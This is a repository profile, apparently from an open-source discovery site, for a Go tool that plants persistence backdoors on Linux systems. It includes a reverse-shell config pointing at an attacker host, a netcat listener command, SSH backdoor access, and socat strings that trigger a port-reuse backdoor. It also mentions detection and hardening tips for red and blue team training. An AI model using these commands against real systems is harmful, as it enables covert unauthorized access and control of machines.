{"name":"linux-persistence: A Go-based Linux Persistence Tool for Security Research","description":"linux-persistence is a comprehensive Linux persistence tool written in Go, designed exclusively for security research and authorized penetration testing. It offers a wide array of techniques to maintain access on Linux systems, making it a valuable resource for red team exercises and security awareness training.","github":"https://github.com/Maikefee/linux-persistence","url":"https://osrepos.com/repo/maikefee-linux-persistence","source":"osrepos.com","sourceDescription":"This repository profile is provided by osrepos.com, an open source repository discovery platform.","repositoryProfile":"https://osrepos.com/repo/maikefee-linux-persistence","generatedFor":"open source discovery and AI-assisted research","markdown":"https://osrepos.com/repo/maikefee-linux-persistence.md","json":"https://osrepos.com/repo/maikefee-linux-persistence.json","topics":["Go","Linux","Persistence","Security","Penetration Testing","Red Team","Backdoor","Ethical Hacking"],"keywords":["Go","Linux","Persistence","Security","Penetration Testing","Red Team","Backdoor","Ethical Hacking"],"stars":null,"summary":"linux-persistence is a comprehensive Linux persistence tool written in Go, designed exclusively for security research and authorized penetration testing. It offers a wide array of techniques to maintain access on Linux systems, making it a valuable resource for red team exercises and security awareness training.","content":"## Introduction\n\n`linux-persistence` is a robust Linux persistence tool, meticulously crafted in Go. It provides a comprehensive suite of techniques designed to maintain unauthorized access on Linux systems. This tool is intended solely for authorized security research, penetration testing, red team exercises, and security awareness training. Users are strongly advised to adhere to ethical guidelines and local laws, as misuse can lead to severe consequences.\n\nThe repository showcases a wide array of persistence methods, including reverse shells, SSH backdoors, hidden files, cron backdoors, Setuid backdoors, PAM backdoors, kernel module backdoors, ICMP backdoors, DNS backdoors, VIM backdoors, Strace backdoors, and port reuse backdoors. Each technique offers a unique approach to achieving and maintaining system access.\n\n## Installation\n\nTo get `linux-persistence` up and running, you'll need to compile it from source. Ensure you have the necessary dependencies installed on your Linux system, including a GCC compiler, Linux kernel development headers, PAM development library, `iptables`, and `netcat` or `socat`.\n\nFirst, clone the repository:\nbash\ngit clone https://github.com/Maikefee/linux-persistence.git\ncd linux-persistence\n\n\nThen, compile the tool:\nbash\ngo build -o linux-persistence main.go\n\n\n## Examples\n\nFor optimal results, it is recommended to run `linux-persistence` with root privileges.\n\n**Basic Usage:**\nbash\nsudo ./linux-persistence\n\n\n**Configuration Options:**\nYou can customize various settings by modifying the `config` struct in `main.go` before compilation:\ngo\nvar config = Config{\n    ReverseShellHost: \"192.168.1.100\",  // Reverse shell target host\n    ReverseShellPort: 4444,             // Reverse shell target port\n    BackdoorPort:     6666,             // VIM backdoor listening port\n    HiddenProcess:    \"systemd-resolved\", // Hidden process name\n    SSHBackdoorPort:  2222,             // SSH backdoor port\n}\n\n\n**Using the Reverse Shell:**\n1.  **Prepare Listener:** On your attacker machine, start a netcat listener:\n    bash\nnc -lvp 4444\n    \n2.  **Run Tool:** On the target machine, execute the tool (it will attempt to connect to the configured `ReverseShellHost:ReverseShellPort`):\n    bash\nsudo ./linux-persistence\n    \n\n**Using the SSH Backdoor:**\nAfter running the tool on the target, you can connect via SSH:\nbash\nssh -p 2222 root@target_ip\n\n\n**Port Reuse:**\nActivate port reuse by sending a specific string:\nbash\necho 'backdoor' | socat - tcp:target_ip:80\n\nDeactivate port reuse:\nbash\necho 'close' | socat - tcp:target_ip:80\n\n\n**ICMP Backdoor:**\nThe ICMP backdoor is triggered by sending an ICMP packet containing the string \"backdoor\".\n\n## Why Use `linux-persistence`?\n\n`linux-persistence` stands out as a valuable resource for anyone involved in offensive security, security research, or defensive training. Its implementation in Go ensures efficiency and a relatively small footprint. The tool's strength lies in its comprehensive collection of diverse persistence techniques, offering practical insights into how adversaries maintain access on Linux systems.\n\nFor security professionals, it serves as an excellent educational platform to understand, simulate, and ultimately develop robust detection and protection strategies against various persistence mechanisms. The README also provides valuable information on detection methods (e.g., `netstat -an`, `ps aux`, `crontab -l`, `lsmod`) and protection recommendations (e.g., regular integrity checks, HIDS/NIDS deployment, restricting root privileges), making it useful for both red and blue teams.\n\n## Links\n\n*   **GitHub Repository:** [https://github.com/Maikefee/linux-persistence](https://github.com/Maikefee/linux-persistence)\n*   **Blog Post URL:** [https://osrepos.jalab.pt/repo/maikefee-linux-persistence](https://osrepos.jalab.pt/repo/maikefee-linux-persistence)","metrics":{"detailViews":5,"githubClicks":7},"dates":{"published":null,"modified":"2025-10-11T21:12:52.000Z"}}